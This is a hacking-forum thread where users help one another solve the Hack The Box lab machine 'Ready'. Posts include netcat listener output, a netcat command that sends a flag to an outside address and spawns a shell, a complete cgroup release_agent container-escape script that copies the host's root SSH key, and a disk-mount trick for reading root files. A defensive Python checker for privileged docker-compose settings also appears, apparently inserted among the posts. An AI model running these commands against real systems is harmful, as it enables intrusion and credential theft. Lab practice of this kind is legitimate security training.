TUTORIAL Ready User Part
by liveartic12 - December 12, 2020 at 10:55 PM
#25
[email protected]:~/Desktop/HacktheBox/Ready# nc -nlvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:59748.
/var/opt/gitlab/gitlab-rails/working


but I don't have an interactive shell, can you pass me the exact payload please? I'm going crazy!!
#26
(December 13, 2020 at 07:16 PM)Kali76 Wrote: [email protected]:~/Desktop/HacktheBox/Ready# nc -nlvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:59748.
/var/opt/gitlab/gitlab-rails/working


but I don't have an interactive shell, can you pass me the exact payload please? I'm going crazy!!

Here you go: User + root, explained in detail.

If you have any issues, PM me or post your issue below.

https://raidforums.com/Thread-Tutorial-R...EASY-STEPS
#27
(December 13, 2020 at 07:24 PM)0xvijay Wrote:
(December 13, 2020 at 07:16 PM)Kali76 Wrote: [email protected]:~/Desktop/HacktheBox/Ready# nc -nlvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:59748.
/var/opt/gitlab/gitlab-rails/working


but I don't have an interactive shell, can you pass me the exact payload please? I'm going crazy!!

Here you go: User + root, explained in detail.

If you have any issues, PM me or post your issue below.

https://raidforums.com/Thread-Tutorial-R...EASY-STEPS

ok thanks, is there a writeup for the rev shell, user git and root?

bro, it doesn't work...

`"cat /flag | nc 10.10.14.24 1234 -e /bin/bash"`

[email protected]:~/Desktop/HacktheBox/Ready# nc -nlvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.220.
Ncat: Connection from 10.10.10.220:60548.
python3 -c "import pty; pty.spawn('/bin/bash')"
#28
(December 13, 2020 at 05:34 PM)southerndarkness Wrote: 1. Gitlab ssrf + redis for foothold
2. Smtp password in /opt/backup/gitlab.rb for root.
3. Break out of the container (mount host fs or use release agent to get what you need)

stuck at root container. any good resource to look at?
#29
Nice machine.
Initially I was going to solve it like laboratory, but this one is even easier.
In general you need two things:
https://liveoverflow.com/gitlab-11-4-7-r...-ctf-2018/ - to get user
https://medium.com/better-programming/es...ae7d17f5a1 - to get root id_rsa from the host (you just need to make proper changes)
something like:
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /cmd
echo "cat /root/.ssh/id_rsa > $host_path/output" >> /cmd
chmod a+x /cmd
sh -c "echo 0 >> /tmp/cgrp/x/cgroup.procs"

cat /output
#30
(December 13, 2020 at 08:26 PM)143kel Wrote:
(December 13, 2020 at 05:34 PM)southerndarkness Wrote: 1. Gitlab ssrf + redis for foothold
2. Smtp password in /opt/backup/gitlab.rb for root.
3. Break out of the container (mount host fs or use release agent to get what you need)

stuck at root container. any good resource to look at?

I used cgroups release_agent to help. Wrote the contents to /output
https://medium.com/better-programming/es...ae7d17f5a1

You can also just mount the fs. Something like:
`
df -h
mkdir /tmp/test
mount /dev/sda2 /tmp/test
cat /tmp/test/root/root.txt
`
#31
(December 13, 2020 at 10:48 PM)southerndarkness Wrote:
(December 13, 2020 at 08:26 PM)143kel Wrote:
(December 13, 2020 at 05:34 PM)southerndarkness Wrote: 1. Gitlab ssrf + redis for foothold
2. Smtp password in /opt/backup/gitlab.rb for root.
3. Break out of the container (mount host fs or use release agent to get what you need)

stuck at root container. any good resource to look at?

I used cgroups release_agent to help. Wrote the contents to /output
https://medium.com/better-programming/es...ae7d17f5a1

You can also just mount the fs. Something like:
`
df -h
mkdir /tmp/test
mount /dev/sda2 /tmp/test
cat /tmp/test/root/root.txt
`

Works like a champ!!
#32
cool


so there're many ways to root this xD
#33
How to capture user.txt from [email protected] please help
#34
(December 13, 2020 at 07:24 AM)southerndarkness Wrote: Just came back to this, dug around and found smtp_password in gitlab.rb and was able to log in as root, but still no flag since we're in a container. :/
Any way to break out?


EDIT: rooted. Basically, realize you're in a privileged container. /opt/backup/docker-compose.yml

You can then abuse cgroups release_agent to dump contents of the host fs into a file in the container.

article here: https://medium.com/better-programming/es...ae7d17f5a1

Could you PM me? I have a question pertaining to this. Thank you!

(December 13, 2020 at 10:45 PM)cbra02011980ioj Wrote: Nice machine.
Initially was going to solve as a laboratory, but this one even easier.
In general you need two things:
https://liveoverflow.com/gitlab-11-4-7-r...-ctf-2018/ - to get user
https://medium.com/better-programming/es...ae7d17f5a1 - to get root id_rsa from the host (you just need to make proper changes)
something like:
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /cmd
echo "cat /root/.ssh/id_rsa > $host_path/output" >> /cmd
chmod a+x /cmd
sh -c "echo 0 >> /tmp/cgrp/x/cgroup.procs"

cat /output

How are you able to mount or use the -o or /cmd?

Am I missing something?
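An added defender-side check, not from any post in this thread, for the root cause named above (the box's /opt/backup/docker-compose.yml declaring the container privileged): a stdlib-only scan of a constructed docker-compose.yml that flags services running privileged or with CAP_SYS_ADMIN added, the settings that let a root-in-container reach the host filesystem. The sample file and the function name audit_compose are my own assumptions, not the box's files.

```python
# Constructed sample compose file for the demo (not the box's own file). The
# first service is the risky shape the thread describes; the second is hardened.
SAMPLE_COMPOSE = """\
version: "3"
services:
  gitlab:
    image: gitlab/gitlab-ee:latest
    privileged: true
    volumes:
      - ./data:/var/opt/gitlab
  web:
    image: nginx:alpine
    cap_drop:
      - ALL
"""

# Capabilities that hand a root-in-container the mount(2) call the thread's
# release_agent and /dev/sda2 tricks depend on.
RISKY_CAPS = {"ALL", "SYS_ADMIN"}


def audit_compose(text):
    """Return {service: [findings]} for services that weaken container isolation.
    Minimal indentation-based scan of docker-compose YAML (stdlib only): services
    are 2-space keys under 'services:', settings 4-space keys, list items 6-space
    '- ' lines. Blank and comment lines are skipped."""
    findings, in_services, service, key = {}, False, None, None
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        indent = len(line) - len(line.lstrip(" "))
        if indent == 0:  # top-level key: track whether we are inside services:
            in_services, service = stripped == "services:", None
        elif not in_services:
            continue
        elif indent == 2 and stripped.endswith(":"):
            service, key = stripped[:-1], None
            findings.setdefault(service, [])
        elif indent == 4 and service:
            key, _, value = stripped.partition(":")
            key = key.strip()
            if key == "privileged" and value.strip().lower() == "true":
                findings[service].append("privileged: true (all caps + host devices)")
        elif indent == 6 and service and stripped.startswith("- "):
            item = stripped[2:].strip()
            if key == "cap_add" and item.upper() in RISKY_CAPS:
                findings[service].append(f"cap_add: {item} (grants mount(2))")
    return {s: f for s, f in findings.items() if f}
```

The hardened service shows the mitigation: no `privileged: true`, and `cap_drop: [ALL]` so the container root cannot mount cgroup or block devices even if it is compromised.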
#35

How are you able to mount or use the -o or /cmd?

Am I missing something?
If you are root, you can do almost whatever you want.
